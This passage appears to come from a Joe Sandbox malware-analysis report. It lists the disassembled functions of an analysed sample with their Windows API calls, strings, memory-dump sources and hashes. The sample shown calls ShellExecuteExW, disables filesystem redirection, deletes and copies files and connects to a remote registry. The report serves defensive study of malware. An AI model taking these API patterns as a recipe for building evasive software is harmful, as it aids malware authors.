                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00A9B903
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
                                                                                                                                                                                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00A9B998
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9B9C7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: <$@
                                                                                                                                                                                                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                                    • Opcode ID: a31933c36b86dc01e0ab776d40c3d4aa1ab08dd40ae6280dd7f3e5693790a382
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9b26d808fc1ba2984dd662f530d0b1cb873e16bedae86f3cb03cb8e6e31f2b38
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a31933c36b86dc01e0ab776d40c3d4aa1ab08dd40ae6280dd7f3e5693790a382
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC714775A10219DFCF10DF94D695A9EBBF5EF08310F048499E856AB291CB74ED81CBA0
                                                                                                                                                                                                                                                                                                    Function 00A77B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A77B6D
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A77BA3
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A77BB4
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A77C36
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0c2c178e94ecd33cc2901ffa5406ec88c92f34b4c32a77443a8fa5b35bc09265
                                                                                                                                                                                                                                                                                                    • Instruction ID: d6255cbd6ce29be466e1e8be830517dac482a8eb0ca93d288526cf0bee7a2954
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c2c178e94ecd33cc2901ffa5406ec88c92f34b4c32a77443a8fa5b35bc09265
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E416EB1604205EFDB16CF64DC84A9E7BB9EF48314F14C0A9AD0A9F246D7B1DD44CBA0
                                                                                                                                                                                                                                                                                                    Function 00AA4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AA48D1
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00AA48E6
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AA492E
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00AA4941
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: fdae07d835f11ea5b27c5f62621f1127e7e5f9e234e804a2e02a61df4f2c4387
                                                                                                                                                                                                                                                                                                    • Instruction ID: bfe2646aecaeaaeeecb40a7387a4ec9164390de18c8ac4e476f4d00da9a07877
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdae07d835f11ea5b27c5f62621f1127e7e5f9e234e804a2e02a61df4f2c4387
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8416D75A0020AEFDB10CF91D884EABBBB9FF4A325F044119F94597290D770ED55CBA0
                                                                                                                                                                                                                                                                                                    Function 00A7272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A727B3
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A727C6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A727F6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: ccdd69e7a5abb2102223acf6c01c7e2c18e88671e1432eb69426538036f77130
                                                                                                                                                                                                                                                                                                    • Instruction ID: 28d88c363852ba0109cd06b5b4fa17a4efbf5c776ae291979145f4871ccf6025
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccdd69e7a5abb2102223acf6c01c7e2c18e88671e1432eb69426538036f77130
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4214971900104BFDB08ABA0DC46DFF7BB8DF45360F10C12AF466971E0CB39494A8760
                                                                                                                                                                                                                                                                                                    Function 00AA39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AA3A29
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00AA3A30
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AA3A45
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00AA3A4D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9b3ea2c22610a876a8fc6c66d098a1ef8f5b198429f51d8f15b03511127df527
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7e7b92cda437351b76e7ff5492a6b05f5894ee9427cfd64e44245dc5df3bdda7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b3ea2c22610a876a8fc6c66d098a1ef8f5b198429f51d8f15b03511127df527
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E21AEB2600219AFEF108FA4DC90FBB77A9EB4A3A4F105218FA91971D0C772CD819760
                                                                                                                                                                                                                                                                                                    Function 00A350DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A3508E,?,?,00A3502E,?,00AD98D8,0000000C,00A35185,?,00000002), ref: 00A350FD
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A35110
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00A3508E,?,?,00A3502E,?,00AD98D8,0000000C,00A35185,?,00000002,00000000), ref: 00A35133
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                    • Opcode ID: bdb7d080540d74279d3a47df7ac28ad5c132ed4e0b0a394e2c8bb36327ef05cb
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9bb14162090d02ea2e7203acef02578694460174c3716f88752af30112295815
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdb7d080540d74279d3a47df7ac28ad5c132ed4e0b0a394e2c8bb36327ef05cb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94F06830900209BFDB119FE4DC59BDDBFB8EF44752F400165F806A61A0DB755D81CA90
                                                                                                                                                                                                                                                                                                    Function 00A1663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A1668B,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A1664A
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A1665C
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00A1668B,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A1666E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                                    • Opcode ID: 70bc43c6f6a864de55780e7d2ed86e076ba686facd03abcfc283efeac04ad30f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 10f897a672275d706eaae565cf3bf43e76ab488f2a4ef9691350b52c20321c17
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70bc43c6f6a864de55780e7d2ed86e076ba686facd03abcfc283efeac04ad30f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4E0CD356025232792111765BC0CBDE65299F83F22B050315FC82D2290DF60CD4380E4
                                                                                                                                                                                                                                                                                                    Function 00A16607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A55657,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A16610
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A16622
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00A55657,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A16635
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                    • Opcode ID: 196869c57ff4216640f2a8f56ebfaa5bcb3411e0cdaec2636792713679d087ec
                                                                                                                                                                                                                                                                                                    • Instruction ID: d457629b3f5cb20ad3b4b9de534268458838b8014f501aafe1dab0a6125736b0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 196869c57ff4216640f2a8f56ebfaa5bcb3411e0cdaec2636792713679d087ec
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7D0C2316025326742226B607C089CE2A14AE93B213050611F856E61A4CF21CD42C19C
                                                                                                                                                                                                                                                                                                    Function 00A83306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A835C4
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00A83646
                                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A8365C
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A8366D
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A8367F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8589c848d27743f45094dc2416fc3d85ff76c385a55ce98171d6afe82cef98dd
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e13ba1ffc0062fb5052f312351a00c20d6e176822710b64a2641db51a647a32
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8589c848d27743f45094dc2416fc3d85ff76c385a55ce98171d6afe82cef98dd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B14C72D00119ABDF15EBA4CD85EEEBBBDEF49710F0040AAF509E6141EB309B44CB61
                                                                                                                                                                                                                                                                                                    Function 00A9ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00A9AE87
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A9AE95
                                                                                                                                                                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A9AEC8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A9B09D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 79e58f3580c2ceaae316d344283aca96a1329ccc10f489b3e0108920c7d3ba97
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4572f2ffefb37a85b1b0c760cc171b5206101bac65c23ab5b78910af55f1653c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79e58f3580c2ceaae316d344283aca96a1329ccc10f489b3e0108920c7d3ba97
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45A1B271A043019FE720DF28D986F2AB7E5AF94710F54881DF9A99B2D2CB71EC41CB91
                                                                                                                                                                                                                                                                                                    Function 00A9C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A9C10E,?,?), ref: 00A9D415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9C505
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A9C560
                                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A9C5C3
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00A9C606
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9C613
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
